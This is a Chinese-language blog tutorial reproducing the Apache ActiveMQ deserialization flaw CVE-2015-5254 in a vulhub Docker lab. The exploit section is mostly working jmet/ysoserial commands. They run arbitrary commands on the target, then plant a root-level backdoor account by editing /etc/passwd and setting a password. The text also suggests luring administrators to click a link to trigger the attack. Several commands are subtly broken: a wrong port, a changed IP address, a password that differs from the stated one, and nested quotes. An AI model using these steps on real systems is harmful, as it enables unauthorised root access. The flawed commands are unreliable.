升级到最新版本
有WAF的可以配置相关规则进行拦截
实验环境
攻击机:kali 2020.2
靶机:CentOS Linux 7
项目地址:
https://github.com/vulhub/vulhub
基础环境搭建
安装docker
curl https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repoyum install https://download.docker.com/linux/fedora/30/x86_64/stable/Packages/containerd.io-1.2.6-3.3.fc30.x86_64.rpmyum install docker-cesystemctl start docker
更换镜像源
vi /etc/docker/daemon.json
修改文件内容,镜像源地址可以用阿里云的镜像地址,百度的镜像源会有一个包下载很慢。自己登陆阿里云获取
{ "registry-mirrors": ["https://xxxxx.mirrors.aliyun.com"]}
保存退出之后,重新加载配置,重启docker
systemctl daemon-reloadsystemctl restart docker
摘取镜像
docker pull busybox
成功打印出"hello world"说明配置成功
docker run busybox echo “hello world”
到此docker配置完成
接下来部署实验环境
实验环境搭建
项目地址
https://github.com/vulhub/vulhub
下载后上传至任意目录,进入目录
vulhub-master/vulhub-master/activemq/CVE-2015-5254
启动docker编译
docker-compose up -d
PS
很多人pip装不上,这里的方法亲测有效;
yum install -y python38wget https://bootstrap.pypa.io/get-pip.pysudo python3 get-pip.pypip -versionpip install docker-compose
环境运行后,将监听61616和8161两个端口其中61616是工作端口,消息在这个端口进行传递;8161是网络管理页面端口访问http://192.168.91.133:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。默认的用户名/密码为admin/admin)
复现步骤
1.漏洞利用过程如下:
a.构造(可以使用ysoserial)可执行命令的序列化对象
b.作为一个消息,发送给目标61616端口
c.访问的Web管理页面,读取消息,触发漏洞
2.使用jmet进行漏洞利用:
首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。
cd /optwget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jarmkdir external
执行命令
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.91.133 6161
此时会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.91.133:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息
点击查看这条消息即可触发命令执行
此时进入容器
docker ps 查看容器iddocker exec -it cc0e9385f975 /bin/bash 进入容器
可看到/ tmp /success已成功创建,说明漏洞利用成功:
利用漏洞添加用户
1.执行jmet的命令添加test用户并将其添加到root组,返回http://192.168.91.133:8161/admin/browse.jsp?JMSDestination=event页面,点击一下消息,触发它:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "useradd -g root -s /bin/bash -u 10010 test" -Yp ROME 192.168.91.133 61616
2.让我们再将passwd中的test的uid修改为0,使它拥有root权限,返回http://192.168.91.133:8161/admin/browse.jsp?JMSDestination=event页面,点击一下消息,触发它。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "sed -i "s/test:x:10010/test:x:0/g" /etc/passwd" -Yp ROME 192.168.91.133 61616
3.让我们再为test用户设置一个密码,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event页面,点击一下消息,触发它。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "echo "test:sd123456" | chpasswd" -Yp ROME 192.168.91.133 61616
到此为止,一个权限为root,密码为123456的用户即创建完毕。我们可以使用ssh直接远程登陆进入操作系统,并且还是最高权限。如此还可以写文件、弹shell等,可以自行发挥
值得注意的是,通过网络管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。
Hi 这里是白泽Sec~
如果你想了解更多公众号的信息,
欢迎关注我哦~
既然在看了,就点一下吧!!